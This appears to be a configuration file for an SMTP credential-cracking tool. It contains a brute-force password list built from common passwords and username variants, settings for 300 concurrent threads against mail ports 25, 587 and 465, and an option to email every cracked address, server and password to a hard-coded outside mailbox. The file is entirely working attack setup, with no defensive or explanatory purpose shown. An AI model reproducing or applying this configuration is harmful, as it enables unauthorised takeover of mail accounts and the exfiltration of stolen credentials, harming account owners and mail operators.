[Sanmao SMTP Mail Cracker]
PassList=#user##newline##User##newline##USER##newline##user#123#newline##user#888#newline##User#123#newline##User#888#newline##domaincenter##newline##Domaincenter##newline##DOMAINCENTER##newline##domaincenter#123#newline##domaincenter#888#newline#password#newline#P@ssw0rd#newline#123456#newline#654321#newline#12345678#newline#qwerty#newline#asdfgh#newline#letmein#newline#abc123#newline#abc123456#newline#000000#newline#123123#newline#111111#newline#222222#newline#333333#newline#444444#newline#555555#newline#666666#newline#777777#newline#888888#newline#999999#newline#696969#newline#admin#newline#master#newline#love#newline#iloveu#newline#iloveyou#newline#superman#newline#batman#newline#fuckme#newline#fuckyou#newline#sunshine#newline#asshole#newline#trustno1#newline#secret#newline#cowboy#newline#cheese#newline#princess#newline#
ThreadCount=300
ServerTopDomain=1
ServerMail=1
ServerSmtp=1
IsSendTestMail=0
TestMailBox=suruiqiang@msn.com
UserIsBeforeAt=1
UserIsFullMail=1
IsSaveResultToFile=1
ChkServerWebMain=1
TestMailSubject=You get a new smtp
TestMailContent=Email: #mail##newline#Server: #server##newline#IP: #serverip##newline#SSL/TLS: #ssl##newline#User: #user##newline#Pass: #pass##newline#
MxRecordOfDomain=1
PortToConnect=25,587,465
ResultFormat=EMail:#mail#	SMTP Server:#server#	IP:#serverip#	Port:#port#	SSL/TLS:#ssl#	Username:#user#	Password:#pass#
ExtraServer=
FetchResultIPCity=1
